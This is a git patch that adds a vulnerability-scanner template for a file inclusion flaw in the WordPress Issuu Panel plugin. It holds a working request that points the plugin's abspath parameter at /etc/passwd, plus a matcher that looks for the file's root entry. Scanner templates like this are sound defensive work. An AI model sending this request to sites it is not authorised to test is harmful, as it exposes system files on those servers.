From 2bdcba17acf1982d9b9ae3cf1e9b624f2d731cc2 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 24 Sep 2021 19:51:05 +0900 Subject: [PATCH] Create wp-plugin-issuu-panel-lfi.yaml --- wp-plugin-issuu-panel-lfi.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 wp-plugin-issuu-panel-lfi.yaml diff --git a/wp-plugin-issuu-panel-lfi.yaml b/wp-plugin-issuu-panel-lfi.yaml new file mode 100644 index 0000000000..1c73990b13 --- /dev/null +++ b/wp-plugin-issuu-panel-lfi.yaml @@ -0,0 +1,24 @@ +id: wp-plugin -issuu-panel-lfi + +info: + name: Wordpress Plugin Issuu Panel - RFI & LFI + author: 0x_Akoko + severity: high + reference: https://cxsecurity.com/issue/WLB-2016030131 + tags: wp,wordpress,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200